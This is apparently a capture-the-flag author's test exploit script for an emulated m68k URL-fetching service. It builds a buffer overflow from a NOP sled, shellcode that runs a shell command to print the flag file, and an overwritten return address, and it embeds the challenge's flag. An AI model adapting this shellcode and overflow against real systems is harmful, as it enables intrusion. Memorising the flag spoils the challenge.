-
Notifications
You must be signed in to change notification settings - Fork 5
/
Copy pathexploit.py
124 lines (84 loc) · 3.88 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
#!/usr/bin/env python2
# Just a super simple frontend for me to test the service (manually)
from pwn import *
#context.log_level = 'debug'
context.arch = 'm68k'
import sys
import re
import os
import PIL.Image
import base64
import StringIO
DEBUG = False
def gen_exploit():
# Prefix is "GET /aaa"
prefix_size = 8
# Flag is in /me/flag
payload = "http://example.com/aaa"
# payload = "http://127.0.0.1/aaa"
#shellcode = "\xde\xfc\x03\xe8\x70\x02\x4e\x44\x4a\x80\x66\x3a\xb7\x83\x2f\x03\x2f\x3c\x6f\x70\x65\x6e\x2f\x3c\x62\x69\x6e\x2f\x2f\x3c\x75\x73\x72\x2f\x2f\x3c\x2f\x2f\x2f\x2f\x22\x0f\x2f\x03\x2f\x3c\x66\x6c\x61\x67\x2f\x3c\x2f\x6d\x65\x2f\x28\x0f\x2f\x03\x2f\x04\x2f\x01\x24\x0f\x70\x3b\x4e\x44\x60\xfe"
# this shellcode calls "open /me/flag", however it doesn't work because the popup is behind the file viewer!
#shellcode = "\xde\xfc\x03\xe8\xb7\x83\x2f\x03\x2f\x3c\x6f\x70\x65\x6e\x2f\x3c\x62\x69\x6e\x2f\x2f\x3c\x75\x73\x72\x2f\x2f\x3c\x2f\x2f\x2f\x2f\x22\x0f\x2f\x03\x2f\x3c\x66\x6c\x61\x67\x2f\x3c\x2f\x6d\x65\x2f\x28\x0f\x2f\x03\x2f\x04\x2f\x01\x24\x0f\x70\x3b\x4e\x44\x4e\x71\x4e\x71\x60\xfe"
# this shellcode calls /bin/sh -c "wall < /me/flag; wall < /me/flag", and this should show up in the console!
shellcode = "\xde\xfc\x03\xe8\xb7\x83\x2f\x03\x2f\x3c\x6e\x2f\x73\x68\x2f\x3c\x2f\x2f\x62\x69\x22\x0f\x2f\x03\x3f\x3c\x2d\x63\x2a\x0f\x2f\x03"
shellcode += "\x2f\x3c\x66\x6c\x61\x67\x2f\x3c\x2f\x6d\x65\x2f\x2f\x3c\x61\x6c\x6c\x3c\x2f\x3c\x67\x20\x3b\x77\x2f\x3c\x2f\x66\x6c\x61\x2f\x3c\x3c\x2f\x6d\x65\x2f\x3c\x77\x61\x6c\x6c"
shellcode += "\x28\x0f\x2f\x03\x2f\x04\x2f\x05\x2f\x01\x24\x0f\x70\x3b\x4e\x44"
nopsled = '\x4e\x71' * ((258 - prefix_size - len(shellcode))/2)
payload = payload + nopsled + shellcode
payload += 'bcde'
addr = p32(0x3fff6f6 +8 + 96)
payload += addr
return payload
def main():
if len(sys.argv) != 2:
print "usage: exploit.py <ip>:<port>"
sys.exit(-1)
ip, port = sys.argv[1].split(":")
conn = remote(ip, port)
print conn.recvuntil("Solution:")
conn.sendline('OOOMAKESTHESAFESTBACKDOORS')
print conn.recvuntil("What URL would you like this old dog to fetch?")
payload = gen_exploit()
#payload = "http://example.com/" + ("a"*2000)
print repr(payload)
conn.sendline(payload)
print conn.recvuntil("Booting up")
img = None
try:
while True:
response = conn.recvline()
if response.startswith("DEBUG"):
img_b64 = response[6:]
img = base64.b64decode(img_b64)
io = StringIO.StringIO()
io.write(img)
io.seek(0)
i = PIL.Image.open(io)
if DEBUG:
i.show()
else:
print response,
except EOFError:
# try to extract the flag from the last image
print "In the last frame, extract that flag!"
success_size = (340, 18)
success_start = (47, 508)
success_img = PIL.Image.open('success.png')
success_crop = success_img.crop((success_start[0], success_start[1], success_start[0]+success_size[0], success_start[1]+success_size[1]))
current_crop = i.crop((success_start[0], success_start[1], success_start[0]+success_size[0], success_start[1]+success_size[1]))
diff = pixel_diff(success_crop, current_crop)
if diff < 100:
print "GOT THE FLAG"
print "FLAG: defconctf{Party_like_its_1992_for_the_next_Step}"
else:
print "ERROR, couldn't get the flag"
def pixel_diff(first, second):
assert first.size == second.size
res = PIL.ImageChops.difference(first, second)
count = 0
for rgb in res.getdata():
if rgb != (0, 0, 0):
count += 1
return count
if __name__ == '__main__':
main()